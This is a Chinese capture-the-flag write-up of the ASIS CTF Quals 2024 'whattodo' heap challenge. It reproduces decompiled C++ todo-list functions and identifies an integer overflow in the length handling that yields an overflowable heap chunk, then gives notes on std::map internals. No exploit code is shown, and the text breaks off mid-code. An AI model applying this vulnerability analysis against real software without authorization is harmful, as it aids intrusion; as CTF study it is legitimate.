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C++中的std::map的运用-ASIS CTF Quals 2024-whattodo
whattodo ======== 试了下fuzz,没出来 只能逆了 逆向 == ```c unsigned __int64 __fastcall todo_add( __int64 a1, __int64 a2, __int64 a3, __int64 a4, __int64 a5, __int64 a6, int a7, int a8, int a9, int a10, int a11, int a12, int a13, int a14, int a15, int a16, int a17, int a18, int a19, int a20, __int64 a21) { // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND] *(_QWORD *)&title_string_object.str[8] = __readfsqword(0x28u); LOBYTE(title_string_object.ptr) = 0; title = &title_string_object; max_len = 0LL; std::__ostream_insert<char,std::char_traits<char>>(std::cout, "Title: ", 7LL); std::operator>><char>(std::cin, &title); find_node_ptr = (struct node *)std::_Rb_tree<std::string,std::pair<std::string const,std::pair<char *,int>>,std::_Select1st<std::pair<std::string const,std::pair<char *,int>>>,std::less<std::string>,std::allocator<std::pair<std::string const,std::pair<char *,int>>>>::find( (__int64)&map_stuct, (__int64)&title); if ( find_node_ptr != (struct node *)&map_stuct.color )// std::cout << "Already exists" << std::endl; { std::__ostream_insert<char,std::char_traits<char>>(std::cout, "Already exists", 14LL); v22 = *(_QWORD *)(std::cout[0] - 24LL); v23 = *(_BYTE **)((char *)&std::cout[30] + v22); if ( !v23 ) std::__throw_bad_cast(); if ( v23[56] ) { v24 = v23[67]; } else { std::ctype<char>::_M_widen_init(*(_QWORD *)((char *)&std::cout[30] + v22)); v24 = 10; v27 = *(__int64 (__fastcall **)())(*(_QWORD *)v23 + 48LL); if ( v27 != std::ctype<char>::do_widen ) v24 = ((__int64 (__fastcall *)(_BYTE *, __int64))v27)(v23, 10LL); } v25 = (std::ostream *)std::ostream::put((std::ostream *)std::cout, v24); std::ostream::flush(v25); goto LABEL_6; } std::__ostream_insert<char,std::char_traits<char>>(std::cout, "Length: ", 8LL); std::istream::_M_extract<unsigned int>(std::cin, &len); len_more1 = (unsigned int)(len + 1); todo_node_chunk = (void *)operator new[](len_more1); if ( len_more1 ) memset(todo_node_chunk, 0, len_more1); find_node_ptr_1 = find_node_ptr; len_3 = len; if ( !map_stuct.parents ) goto LABEL_34; find_node_ptr_2 = find_node_ptr; root_ = (struct node *)map_stuct.parents; title_2 = title; max_len_1 = max_len; title_1 = title; current_node = (struct node *)map_stuct.parents; do { while ( 1 ) { current_node_title_len = current_node->title_str_obj.size; len_1 = max_len_1; if ( current_node_title_len <= max_len_1 ) len_1 = current_node->title_str_obj.size; if ( len_1 ) { cmp_result = memcmp((const void *)current_node->title_str_obj.ptr, title_1, len_1); if ( cmp_result ) break; } difference = current_node_title_len - max_len_1; if ( difference >= 0x80000000LL ) goto LABEL_24; if ( difference > (__int64)0xFFFFFFFF7FFFFFFFLL ) { cmp_result = difference; break; } LABEL_15: current_node = (struct node *)current_node->right_son_node; if ( !current_node ) goto LABEL_25; } if ( cmp_result < 0 ) goto LABEL_15; LABEL_24: find_node_ptr_1 = current_node; current_node = (struct node *)current_node->left_son_node; } while ( current_node ); LABEL_25: max_len_2 = max_len_1; find_node_ptr = find_node_ptr_2; root = root_; if ( find_node_ptr_1 == (struct node *)&map_stuct.color ) goto LABEL_34; len_4 = find_node_ptr_1->title_str_obj.size; len_2 = max_len_2; if ( len_4 <= max_len_2 ) len_2 = find_node_ptr_1->title_str_obj.size; if ( len_2 ) { LODWORD(v41) = memcmp(title_2, (const void *)find_node_ptr_1->title_str_obj.ptr, len_2); if ( (_DWORD)v41 ) { LABEL_32: if ( (int)v41 < 0 ) goto LABEL_34; goto LABEL_33; } } v41 = max_len_2 - len_4; if ( (__int64)(max_len_2 - len_4) > 0x7FFFFFFF ) { LABEL_33: find_node_ptr_1->todo_pair.todo_ptr = todo_node_chunk; LODWORD(find_node_ptr_1->todo_pair.todo_len) = len_3; goto LABEL_36; } if ( v41 >= (__int64)0xFFFFFFFF80000000LL ) goto LABEL_32; LABEL_34: p_title = &title; new_node = std::_Rb_tree<std::string,std::pair<std::string const,std::pair<char *,int>>,std::_Select1st<std::pair<std::string const,std::pair<char *,int>>>,std::less<std::string>,std::allocator<std::pair<std::string const,std::pair<char *,int>>>>::_M_emplace_hint_unique<std::piecewise_construct_t const&,std::tuple<std::string const&>,std::tuple<>>( &map_stuct, find_node_ptr_1, (char ***)&p_title); root = (struct node *)map_stuct.parents; new_node->todo_pair.todo_ptr = todo_node_chunk; LODWORD(new_node->todo_pair.todo_len) = len_3; if ( !root ) goto insert; max_len_2 = max_len; title_2 = title; LABEL_36: max_len_3 = max_len_2; v44 = find_node_ptr; current = root; max_len_4 = max_len_3; while ( 2 ) { while ( 2 ) { current_len = current->title_str_obj.size; len_5 = max_len_4; if ( current_len <= max_len_4 ) len_5 = current->title_str_obj.size; if ( !len_5 || (comp_result = memcmp((const void *)current->title_str_obj.ptr, title_2, len_5)) == 0 ) { differ = current_len - max_len_4; if ( differ >= 0x80000000LL ) goto LABEL_46; if ( differ > (__int64)0xFFFFFFFF7FFFFFFFLL ) { comp_result = differ; break; } LABEL_37: current = (struct node *)current->right_son_node; if ( !current ) goto access; continue; } break; } if ( comp_result < 0 ) goto LABEL_37; LABEL_46: v44 = current; current = (struct node *)current->left_son_node; if ( current ) continue; break; } access: v51 = max_len_4; find_node_ptr = v44; v52 = v51; if ( find_node_ptr == (struct node *)&map_stuct.color ) goto insert; size = find_node_ptr->title_str_obj.size; v54 = v51; if ( size <= v51 ) v54 = find_node_ptr->title_str_obj.size; if ( v54 && (LODWORD(v55) = memcmp(title_2, (const void *)find_node_ptr->title_str_obj.ptr, v54), (_DWORD)v55) ) { LABEL_54: if ( (int)v55 < 0 ) goto insert; } else { v55 = v52 - size; if ( (__int64)(v52 - size) <= 0x7FFFFFFF ) { if ( v55 >= (__int64)0xFFFFFFFF80000000LL ) goto LABEL_54; insert: title_addr = &title; find_node_ptr = std::_Rb_tree<std::string,std::pair<std::string const,std::pair<char *,int>>,std::_Select1st<std::pair<std::string const,std::pair<char *,int>>>,std::less<std::string>,std::allocator<std::pair<std::string const,std::pair<char *,int>>>>::_M_emplace_hint_unique<std::piecewise_construct_t const&,std::tuple<std::string const&>,std::tuple<>>( &map_stuct, find_node_ptr, (char ***)&title_addr); } } if ( !find_node_ptr->todo_pair.todo_ptr ) { std::__ostream_insert<char,std::char_traits<char>>(std::cout, "Out of memory", 13LL); v56 = *(_QWORD *)(std::cout[0] - 24LL); v57 = *(_BYTE **)((char *)&std::cout[30] + v56); if ( v57 ) { if ( v57[56] ) { v58 = (unsigned int)(char)v57[67]; } else { std::ctype<char>::_M_widen_init(*(_QWORD *)((char *)&std::cout[30] + v56)); v58 = 10LL; v64 = *(__int64 (__fastcall **)())(*(_QWORD *)v57 + 48LL); if ( v64 != std::ctype<char>::do_widen ) v58 = (unsigned int)((char (__fastcall *)(_BYTE *, __int64))v64)(v57, 10LL); } v59 = (std::ostream *)std::ostream::put((std::ostream *)std::cout, v58); std::ostream::flush(v59); todo_add( (__int64)v59, v58, v60, v61, v62, v63, a7, a8, a9, a10, a11, a12, a13, a14, a15, a16, a17, a18, a19, a20, a21); } std::__throw_bad_cast(); } LABEL_6: if ( title != &title_string_object ) operator delete(title); return *(_QWORD *)&title_string_object.str[8] - __readfsqword(0x28u); } unsigned __int64 todo_edit(void) { // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND] *(_QWORD *)&str_obj.str[8] = __readfsqword(0x28u); LOBYTE(str_obj.ptr) = 0; title_str_obj_ptr = &str_obj; len_1 = 0LL; std::__ostream_insert<char,std::char_traits<char>>(std::cout, "Title: ", 7LL); std::operator>><char>(std::cin, &title_str_obj_ptr); if ( &map_stuct.color == (_QWORD *)std::_Rb_tree<std::string,std::pair<std::string const,std::pair<char *,int>>,std::_Select1st<std::pair<std::string const,std::pair<char *,int>>>,std::less<std::string>,std::allocator<std::pair<std::string const,std::pair<char *,int>>>>::find( (struct node *)&map_stuct, (struct node *)&title_str_obj_ptr) ) { std::__ostream_insert<char,std::char_traits<char>>(std::cout, "Not found", 9LL); v25 = *(_QWORD *)(std::cout[0] - 24LL); v26 = *(_BYTE **)((char *)&std::cout[30] + v25); if ( !v26 ) std::__throw_bad_cast(); if ( v26[56] ) { v27 = v26[67]; } else { std::ctype<char>::_M_widen_init(*(_QWORD *)((char *)&std::cout[30] + v25)); v27 = 10; v29 = *(__int64 (__fastcall **)())(*(_QWORD *)v26 + 48LL); if ( v29 != std::ctype<char>::do_widen ) v27 = ((__int64 (__fastcall *)(_BYTE *, __int64))v29)(v26, 10LL); } v28 = (std::ostream *)std::ostream::put((std::ostream *)std::cout, v27); std::ostream::flush(v28); goto finish; } std::__ostream_insert<char,std::char_traits<char>>(std::cout, "TODO: ", 6LL); curent = (struct node *)map_stuct.parents; if ( !map_stuct.parents ) { end_iterator_adddr = (struct node *)&map_stuct.color; goto insert; } title_1 = title_str_obj_ptr; root__node = (struct node *)map_stuct.parents; len_2 = len_1; end_iterator_adddr_1 = (struct node *)&map_stuct.color; do { while ( 1 ) { current_len = curent->title_str_obj.size; len = len_2; if ( current_len <= len_2 ) len = curent->title_str_obj.size; if ( len ) { cmp_result = memcmp((const void *)curent->title_str_obj.ptr, title_1, len); if ( cmp_result ) break; } differ = current_len - len_2; if ( differ >= 0x80000000LL ) goto LABEL_13; if ( differ > (__int64)0xFFFFFFFF7FFFFFFFLL ) { cmp_result = differ; break; } LABEL_4: curent = (struct node *)curent->right_son_node; if ( !curent ) goto LABEL_14; } if ( cmp_result < 0 ) goto LABEL_4; LABEL_13: end_iterator_adddr_1 = curent; curent = (struct node *)curent->left_son_node; } while ( curent ); LABEL_14: end_iterator_adddr = end_iterator_adddr_1; root__node_1 = root__node; if ( end_iterator_adddr_1 == (struct node *)&map_stuct.color ) goto insert; end_iterator_adddr_1_len = end_iterator_adddr_1->title_str_obj.size; len_3 = len_2; if ( end_iterator_adddr_1_len <= len_2 ) len_3 = end_iterator_adddr_1->title_str_obj.size; if ( len_3 ) { LODWORD(comp_result) = memcmp(title_1, (const void *)end_iterator_adddr_1->title_str_obj.ptr, len_3); end_iterator_adddr = end_iterator_adddr_1; if ( (_DWORD)comp_result ) { LABEL_21: if ( (int)comp_result < 0 ) goto insert; goto LABEL_22; } } comp_result = len_2 - end_iterator_adddr_1_len; if ( (__int64)(len_2 - end_iterator_adddr_1_len) > 0x7FFFFFFF ) { LABEL_22: *(__int64 *)((char *)&std::cin[2] + *(_QWORD *)(std::cin[0] - 24)) = SLODWORD(end_iterator_adddr->todo_pair.todo_len); goto LABEL_23; } if ( comp_result >= (__int64)0xFFFFFFFF80000000LL ) goto LABEL_21; insert: p_title_str_obj_ptr = &title_str_obj_ptr; v24 = std::_Rb_tree<std::string,std::pair<std::string const,std::pair<char *,int>>,std::_Select1st<std::pair<std::string const,std::pair<char *,int>>>,std::less<std::string>,std::allocator<std::pair<std::string const,std::pair<char *,int>>>>::_M_emplace_hint_unique<std::piecewise_construct_t const&,std::tuple<std::string const&>,std::tuple<>>( &map_stuct, end_iterator_adddr, (char ***)&p_title_str_obj_ptr); root__node_1 = (struct node *)map_stuct.parents; *(__int64 *)((char *)&std::cin[2] + *(_QWORD *)(std::cin[0] - 24)) = SLODWORD(v24->todo_pair.todo_len); if ( !root__node_1 ) { end_iterator_adddr_2 = (struct node *)&map_stuct.color; goto LABEL_42; } title_1 = title_str_obj_ptr; len_2 = len_1; LABEL_23: end_iterator_adddr_2 = (struct node *)&map_stuct.color; len_4 = len_2; curent_node = root__node_1; while ( 2 ) { while ( 2 ) { len_5 = curent_node->title_str_obj.size; len_6 = len_4; if ( len_5 <= len_4 ) len_6 = curent_node->title_str_obj.size; if ( !len_6 || (differ_2 = memcmp((const void *)curent_node->title_str_obj.ptr, title_1, len_6)) == 0 ) { differ_1 = len_5 - len_4; if ( differ_1 >= 0x80000000LL ) goto LABEL_33; if ( differ_1 > (__int64)0xFFFFFFFF7FFFFFFFLL ) { differ_2 = differ_1; break; } LABEL_24: curent_node = (struct node *)curent_node->right_son_node; if ( !curent_node ) goto LABEL_34; continue; } break; } if ( differ_2 < 0 ) goto LABEL_24; LABEL_33: end_iterator_adddr_2 = curent_node; curent_node = (struct node *)curent_node->left_son_node; if ( curent_node ) continue; break; } LABEL_34: if ( end_iterator_adddr_2 == (struct node *)&map_stuct.color ) goto LABEL_42; end_iterator_adddr_2_len = end_iterator_adddr_2->title_str_obj.size; end_iterator_adddr_2_len_1 = len_4; if ( end_iterator_adddr_2_len <= len_4 ) end_iterator_adddr_2_len_1 = end_iterator_adddr_2->title_str_obj.size; if ( end_iterator_adddr_2_len_1 && (LODWORD(comp_result_1) = memcmp( title_1, (const void *)end_iterator_adddr_2->title_str_obj.ptr, end_iterator_adddr_2_len_1), (_DWORD)comp_result_1) ) { LABEL_41: if ( (int)comp_result_1 < 0 ) goto LABEL_42; } else { comp_result_1 = len_4 - end_iterator_adddr_2_len; if ( (__int64)(len_4 - end_iterator_adddr_2_len) <= 0x7FFFFFFF ) { if ( comp_result_1 >= (__int64)0xFFFFFFFF80000000LL ) goto LABEL_41; LABEL_42: v32 = &title_str_obj_ptr; end_iterator_adddr_2 = std::_Rb_tree<std::string,std::pair<std::string const,std::pair<char *,int>>,std::_Select1st<std::pair<std::string const,std::pair<char *,int>>>,std::less<std::string>,std::allocator<std::pair<std::string const,std::pair<char *,int>>>>::_M_emplace_hint_unique<std::piecewise_construct_t const&,std::tuple<std::string const&>,std::tuple<>>( &map_stuct, end_iterator_adddr_2, (char ***)&v32); } } std::__istream_extract(std::cin, end_iterator_adddr_2->todo_pair.todo_ptr, 0x7FFFFFFFFFFFFFFFLL); finish: if ( title_str_obj_ptr != &str_obj ) operator delete(title_str_obj_ptr); return *(_QWORD *)&str_obj.str[8] - __readfsqword(0x28u); } unsigned __int64 todo_show(void) { struct node *curent_node; // r15 struct string *title_str_obj_ptr_1; // r12 unsigned __int64 len_1; // r14 struct node *end_iterator_adddr; // rbx unsigned __int64 len_2; // rbp size_t len_3; // rdx int comp_result; // eax unsigned __int64 len_4; // r13 size_t len_5; // rdx int comp_result_1; // eax const char *todo_ptr; // rbx size_t todo_len; // rax _BYTE *v12; // rbx char v13; // si std::ostream *v14; // rax __int64 (__fastcall *v16)(); // rax struct string **p_title_str_obj_ptr; // [rsp+18h] [rbp-70h] BYREF struct string *title_str_obj_ptr; // [rsp+20h] [rbp-68h] BYREF unsigned __int64 len; // [rsp+28h] [rbp-60h] struct string str_obj; // [rsp+30h] [rbp-58h] BYREF *(_QWORD *)&str_obj.str[8] = __readfsqword(0x28u); LOBYTE(str_obj.ptr) = 0; title_str_obj_ptr = &str_obj; len = 0LL; std::__ostream_insert<char,std::char_traits<char>>(std::cout, "Title: ", 7LL); std::operator>><char>(std::cin, &title_str_obj_ptr); if ( &map_stuct.color == (_QWORD *)std::_Rb_tree<std::string,std::pair<std::string const,std::pair<char *,int>>,std::_Select1st<std::pair<std::string const,std::pair<char *,int>>>,std::less<std::string>,std::allocator<std::pair<std::string const,std::pair<char *,int>>>>::find( (struct node *)&map_stuct, (struct node *)&title_str_obj_ptr) ) { std::__ostream_insert<char,std::char_traits<char>>(std::cout, "Not found", 9LL); v12 = *(_BYTE **)((char *)&std::cout[30] + *(_QWORD *)(std::cout[0] - 24LL)); if ( !v12 ) std::__throw_bad_cast(); goto LABEL_27; } std::__ostream_insert<char,std::char_traits<char>>(std::cout, "TODO: ", 6LL); curent_node = (struct node *)map_stuct.parents; if ( !map_stuct.parents ) { end_iterator_adddr = (struct node *)&map_stuct.color; goto LABEL_23; } title_str_obj_ptr_1 = title_str_obj_ptr; len_1 = len; end_iterator_adddr = (struct node *)&map_stuct.color; do { while ( 1 ) { len_2 = curent_node->title_str_obj.size; len_3 = len_1; if ( len_2 <= len_1 ) len_3 = curent_node->title_str_obj.size; if ( len_3 ) { comp_result = memcmp((const void *)curent_node->title_str_obj.ptr, title_str_obj_ptr_1, len_3); if ( comp_result ) break; } if ( (__int64)(len_2 - len_1) >= 0x80000000LL ) goto LABEL_13; if ( (__int64)(len_2 - len_1) > (__int64)0xFFFFFFFF7FFFFFFFLL ) { comp_result = len_2 - len_1; break; } LABEL_4: curent_node = (struct node *)curent_node->right_son_node; if ( !curent_node ) goto LABEL_14; } if ( comp_result < 0 ) goto LABEL_4; LABEL_13: end_iterator_adddr = curent_node; curent_node = (struct node *)curent_node->left_son_node; } while ( curent_node ); LABEL_14: if ( end_iterator_adddr == (struct node *)&map_stuct.color ) goto LABEL_23; len_4 = end_iterator_adddr->title_str_obj.size; len_5 = len_1; if ( len_4 <= len_1 ) len_5 = end_iterator_adddr->title_str_obj.size; if ( len_5 && (comp_result_1 = memcmp(title_str_obj_ptr_1, (const void *)end_iterator_adddr->title_str_obj.ptr, len_5)) != 0 ) { LABEL_22: if ( comp_result_1 < 0 ) goto LABEL_23; } else if ( (__int64)(len_1 - len_4) <= 0x7FFFFFFF ) { if ( (__int64)(len_1 - len_4) >= (__int64)0xFFFFFFFF80000000LL ) { comp_result_1 = len_1 - len_4; goto LABEL_22; } LABEL_23: p_title_str_obj_ptr = &title_str_obj_ptr; end_iterator_adddr = std::_Rb_tree<std::string,std::pair<std::string const,std::pair<char *,int>>,std::_Select1st<std::pair<std::string const,std::pair<char *,int>>>,std::less<std::string>,std::allocator<std::pair<std::string const,std::pair<char *,int>>>>::_M_emplace_hint_unique<std::piecewise_construct_t const&,std::tuple<std::string const&>,std::tuple<>>( &map_stuct, end_iterator_adddr, (char ***)&p_title_str_obj_ptr); } todo_ptr = (const char *)end_iterator_adddr->todo_pair.todo_ptr; if ( todo_ptr ) { todo_len = strlen(todo_ptr); std::__ostream_insert<char,std::char_traits<char>>(std::cout, todo_ptr, todo_len); } else { std::ios::clear( (char *)std::cout + *(_QWORD *)(std::cout[0] - 24LL), *(_DWORD *)((char *)&std::cout[4] + *(_QWORD *)(std::cout[0] - 24LL)) | 1u); } v12 = *(_BYTE **)((char *)&std::cout[30] + *(_QWORD *)(std::cout[0] - 24LL)); if ( !v12 ) std::__throw_bad_cast(); LABEL_27: if ( v12[56] ) { v13 = v12[67]; } else { std::ctype<char>::_M_widen_init(v12); v13 = 10; v16 = *(__int64 (__fastcall **)())(*(_QWORD *)v12 + 48LL); if ( v16 != std::ctype<char>::do_widen ) v13 = ((__int64 (__fastcall *)(_BYTE *, __int64))v16)(v12, 10LL); } v14 = (std::ostream *)std::ostream::put((std::ostream *)std::cout, v13); std::ostream::flush(v14); if ( title_str_obj_ptr != &str_obj ) operator delete(title_str_obj_ptr); return *(_QWORD *)&str_obj.str[8] - __readfsqword(0x28u); } unsigned __int64 todo_delete(void) { void *v0; // r13 void *v1; // r12 unsigned __int64 v2; // r15 int *v3; // rbp unsigned __int64 v4; // r14 size_t v5; // rdx int v6; // eax unsigned __int64 v7; // r14 size_t v8; // rdx int v9; // eax void *v10; // rdi __int64 v11; // rax int *v12; // rdx int *v13; // r13 __int64 v14; // r12 __int64 v15; // rdi __int64 v16; // rax void *v17; // rdi void *v18; // rbp __int64 v20; // rax _BYTE *v21; // rbx char v22; // si std::ostream *v23; // rax __int64 (__fastcall *v24)(); // rax void **p_s2; // [rsp+18h] [rbp-70h] BYREF void *titile; // [rsp+20h] [rbp-68h] BYREF unsigned __int64 v27; // [rsp+28h] [rbp-60h] __int64 v28[3]; // [rsp+30h] [rbp-58h] BYREF unsigned __int64 v29; // [rsp+48h] [rbp-40h] v29 = __readfsqword(0x28u); LOBYTE(v28[0]) = 0; titile = v28; v27 = 0LL; std::__ostream_insert<char,std::char_traits<char>>(std::cout, "Title: ", 7LL); std::operator>><char>(std::cin, &titile); if ( &MEMORY[0x72C8] == (int *)std::_Rb_tree<std::string,std::pair<std::string const,std::pair<char *,int>>,std::_Select1st<std::pair<std::string const,std::pair<char *,int>>>,std::less<std::string>,std::allocator<std::pair<std::string const,std::pair<char *,int>>>>::find( (__int64)&map_stuct, (__int64)&titile) ) { std::__ostream_insert<char,std::char_traits<char>>(std::cout, "Not found", 9LL); v20 = *(_QWORD *)(std::cout[0] - 24); v21 = *(_BYTE **)((char *)&std::cout[30] + v20); if ( !v21 ) std::__throw_bad_cast(); if ( v21[56] ) { v22 = v21[67]; } else { std::ctype<char>::_M_widen_init(*(__int64 *)((char *)&std::cout[30] + v20)); v22 = 10; v24 = *(__int64 (__fastcall **)())(*(_QWORD *)v21 + 48LL); if ( v24 != std::ctype<char>::do_widen ) v22 = ((__int64 (__fastcall *)(_BYTE *, __int64))v24)(v21, 10LL); } v23 = (std::ostream *)std::ostream::put((std::ostream *)std::cout, v22); std::ostream::flush(v23); goto LABEL_32; } v0 = MEMORY[0x72D0]; if ( !MEMORY[0x72D0] ) { v3 = &MEMORY[0x72C8]; goto LABEL_23; } v1 = titile; v2 = v27; v3 = &MEMORY[0x72C8]; do { while ( 1 ) { v4 = *((_QWORD *)v0 + 5); v5 = v2; if ( v4 <= v2 ) v5 = *((_QWORD *)v0 + 5); if ( v5 ) { v6 = memcmp(*((const void **)v0 + 4), v1, v5); if ( v6 ) break; } if ( (__int64)(v4 - v2) >= 0x80000000LL ) goto LABEL_13; if ( (__int64)(v4 - v2) > (__int64)0xFFFFFFFF7FFFFFFFLL ) { v6 = v4 - v2; break; } LABEL_4: v0 = (void *)*((_QWORD *)v0 + 3); if ( !v0 ) goto LABEL_14; } if ( v6 < 0 ) goto LABEL_4; LABEL_13: v3 = (int *)v0; v0 = (void *)*((_QWORD *)v0 + 2); } while ( v0 ); LABEL_14: if ( v3 == &MEMORY[0x72C8] ) goto LABEL_23; v7 = *((_QWORD *)v3 + 5); v8 = v2; if ( v7 <= v2 ) v8 = *((_QWORD *)v3 + 5); if ( v8 && (v9 = memcmp(v1, *((const void **)v3 + 4), v8)) != 0 ) { LABEL_22: if ( v9 < 0 ) goto LABEL_23; } else if ( (__int64)(v2 - v7) <= 0x7FFFFFFF ) { if ( (__int64)(v2 - v7) >= (__int64)0xFFFFFFFF80000000LL ) { v9 = v2 - v7; goto LABEL_22; } LABEL_23: p_s2 = &titile; v3 = (int *)std::_Rb_tree<std::string,std::pair<std::string const,std::pair<char *,int>>,std::_Select1st<std::pair<std::string const,std::pair<char *,int>>>,std::less<std::string>,std::allocator<std::pair<std::string const,std::pair<char *,int>>>>::_M_emplace_hint_unique<std::piecewise_construct_t const&,std::tuple<std::string const&>,std::tuple<>>( &map_stuct, v3, &p_s2); } v10 = (void *)*((_QWORD *)v3 + 8); if ( v10 ) operator delete(v10, 1uLL); v11 = std::_Rb_tree<std::string,std::pair<std::string const,std::pair<char *,int>>,std::_Select1st<std::pair<std::string const,std::pair<char *,int>>>,std::less<std::string>,std::allocator<std::pair<std::string const,std::pair<char *,int>>>>::equal_range( &map_stuct, &titile); v13 = v12; v14 = v11; if ( MEMORY[0x72D8] == v11 && &MEMORY[0x72C8] == v12 ) { std::_Rb_tree<std::string,std::pair<std::string const,std::pair<char *,int>>,std::_Select1st<std::pair<std::string const,std::pair<char *,int>>>,std::less<std::string>,std::allocator<std::pair<std::string const,std::pair<char *,int>>>>::_M_erase(MEMORY[0x72D0]); MEMORY[0x72D8] = (__int64)&MEMORY[0x72C8]; MEMORY[0x72D0] = 0LL; MEMORY[0x72E0] = (__int64)&MEMORY[0x72C8]; MEMORY[0x72E8] = 0LL; } else if ( v12 != (int *)v11 ) { do { v15 = v14; v14 = std::_Rb_tree_increment(v14); v16 = std::_Rb_tree_rebalance_for_erase(v15, &MEMORY[0x72C8]); v17 = *(void **)(v16 + 32); v18 = (void *)v16; if ( v17 != (void *)(v16 + 48) ) operator delete(v17, *(_QWORD *)(v16 + 48) + 1LL); operator delete(v18, 0x50uLL); --MEMORY[0x72E8]; } while ( v13 != (int *)v14 ); } LABEL_32: if ( titile != v28 ) operator delete(titile, v28[0] + 1); return v29 - __readfsqword(0x28u); } ``` 这里存在整数溢出,输入-1,然后可以溢出0xffffffff,但size只有0x20 ```c std::__ostream_insert<char,std::char_traits<char>>(std::cout, "Length: ", 8LL); std::istream::_M_extract<unsigned int>(std::cin, &len); len_more1 = (unsigned int)(len + 1); todo_node_chunk = (void *)operator new[](len_more1); if ( len_more1 ) memset(todo_node_chunk, 0, len_more1); ``` edit发现输入无限制?难道可以溢出?发现不行好像自动束缚了 ```c std::__istream_extract(std::cin, *((_QWORD *)addr_node + 8), 0x7FFFFFFFFFFFFFFFLL); ``` map === 但难点是map的逆向 [map的内存布局](https://blog.csdn.net/liuyuan185442111/article/details/135431267) [std::map原理](https://blog.csdn.net/wangbuji/article/details/123347299) [C++(STL):31 ---关联式容器map源码剖析](https://cloud.tencent.com/developer/article/1784465) map是C++ STL中的关联容器,存储的是键值对(key-value),可以通过key快速索引到value。map容器中的数据是自动排序的,其排序方式是严格的弱排序(stick weak ordering),即在判断Key1和Key2的大小时,使用“<”而不是“<=”。map 使用二叉搜索树实现,STL map的底层实现是红黑树。 map有几个值得注意的地方:map的赋值运算是深拷贝,即调用map\_a = map\_b后,map\_a中的元素拥有独立的内存空间。map的\[\]运算比较有意思,当元素不存在的时候会插入新的元素;在map中查找key是否存在时可以用find或count方法,find查找成功返回的是迭代器,查找失败则返回mymap.end(),说明该key不存在;map中的key不允许重复,其count方法只能返回0或1。 map定义 ----- map的所有元素都是pair,同时具备key和value,其中pair的第一个元素作为key,第二个元素作为value。map不允许相同key出现,并且所有pair根据key来自动排序,其中pair的定义在如下: template <typename T1, typename T2> struct pair { typedef T1 first\_type; typedef T2 second\_type; ```php T1 first; T2 second; pair() : first(T1()), second(T2()) { } pair(const T1& a, const T2& b) : first(a), second(b) { } ``` }; 从定义中看到pair使用模板化的struct来实现的,成员变量默认都是public类型。map的key不能被修改,但是value可以被修改,STL中的map是基于红黑树来实现的,因此可以认为map是基于红黑树封装了一层map的接口,底层的操作都是借助于RB-Tree的特性来实现的。 template <class Key, class T, class Compare = less<Key>, class Alloc = alloc> class map { public: typedef Key key\_type; //key类型 typedef T data\_type; //value类型 typedef T mapped\_type; typedef pair<const Key, T> value\_type; //元素类型, const要保证key不被修改 typedef Compare key\_compare; //用于key比较的函数 private: //内部采用RBTree作为底层容器 typedef rb\_tree<key\_type, value\_type, identity<value\_type>, key\_compare, Alloc> rep\_type; rep\_type t; //t为内部RBTree容器 public: //iterator\_traits相关 typedef typename rep\_type::const\_pointer pointer; typedef typename rep\_type::const\_pointer const\_pointer; typedef typename rep\_type::const\_reference reference; typedef typename rep\_type::const\_reference const\_reference; typedef typename rep\_type::difference\_type difference\_type; //迭代器相关 typedef typename rep\_type::iterator iterator; typedef typename rep\_type::const\_iterator const\_iterator; typedef typename rep\_type::const\_reverse\_iterator reverse\_iterator; typedef typename rep\_type::const\_reverse\_iterator const\_reverse\_iterator; typedef typename rep\_type::size\_type size\_type; //迭代器函数 iterator begin() { return t.begin(); } const\_iterator begin() const { return t.begin(); } iterator end() { return t.end(); } const\_iterator end() const { return t.end(); } reverse\_iterator rbegin() { return t.rbegin(); } const\_reverse\_iterator rbegin() const { return t.rbegin(); } reverse\_iterator rend() { return t.rend(); } const\_reverse\_iterator rend() const { return t.rend(); } //容量函数 bool empty() const { return t.empty(); } size\_type size() const { return t.size(); } size\_type max\_size() const { return t.max\_size(); } //key和value比较函数 key\_compare key\_comp() const { return t.key\_comp(); } value\_compare value\_comp() const { return value\_compare(t.key\_comp()); } //运算符 T& operator\[\](const key\_type& k) { return (\*((insert(value\_type(k, T()))).first)).second; } friend bool operator== \_\_STL\_NULL\_TMPL\_ARGS (const map&, const map&); friend bool operator< \_\_STL\_NULL\_TMPL\_ARGS (const map&, const map&); } 节点 -- Node 有 5 个成员,除了 left、right、data,还有 color 和 parent。 C++实现,位于bits/stl\_tree.h /\*\* - Non-template code \*\*/ enum rb\_tree\_color { kRed, kBlack }; struct rb\_tree\_node\_base { rb\_tree*color color*; rb\_tree\_node*base\* parent*; rb\_tree\_node*base\* left*; rb\_tree\_node*base\* right*; }; /\*\* - template code \*\*/ template<typename Value> struct rb\_tree\_node : public rb\_tree\_node\_base { Value value*field*; }; 树 - Tree 有更多的成员,它包含一个完整的 rb\_tree\_node\_base(color/parent/left/right),还有 node\_count 和 key\_compare 这两个额外的成员。 这里省略了一些默认模板参数,如 key\_compare 和 allocator。 template<typename Key, typename Value> // key\_compare and allocator class rb\_tree { public: typedef std::less<Key> key\_compare; typedef rb\_tree\_iterator<Value> iterator; protected: struct rb\_tree\_impl // : public node\_allocator { key\_compare key*compare*; rb\_tree\_node*base header*; size\_t node*count*; }; rb\_tree*impl impl*; }; template<typename Key, typename T> // key\_compare and allocator class map { public: typedef std::pair<const Key, T> value\_type; private: typedef rb\_tree<Key, value\_type> rep\_type; rep*type tree*; }; 迭代器 --- rb\_tree 的 iterator 的数据结构很简单,只包含一个 rb\_tree\_node\_base 指针,但是其++/--操作却不见得简单(具体实现函数不在头文件中,而在 libstdc++ 库文件中)。 // defined in library, not in header rb\_tree\_node\_base *rb\_tree\_increment(rb\_tree\_node\_base* node); // others: decrement, reblance, etc. template<typename Value> struct rb\_tree\_node : public rb\_tree\_node\_base { Value value*field*; }; template<typename Value> struct rb\_tree\_iterator { Value& operator*() const { return static\_cast<rb\_tree\_node<Value>*>(node\_)->value*field*; } rb\_tree*iterator& operator++() { node* = rb\_tree*increment(node*); return \*this; } rb\_tree\_node*base\* node*; }; 再逆 == 交给AI逆了下 add大概逻辑如下 ```c #include <iostream> #include <string> #include <map> #include <new> #include <cstring> struct TodoNode { char *content; int length; }; std::map<std::string, TodoNode> todo; unsigned __int64 __fastcall todo_add() { unsigned __int64 start_time = __readfsqword(0x28u); char title[256] = {0}; // 假设最大标题长度为256 unsigned int len = 0; char *todo_node_chunk = nullptr; // 读取标题 std::cout << "Title: "; std::cin >> 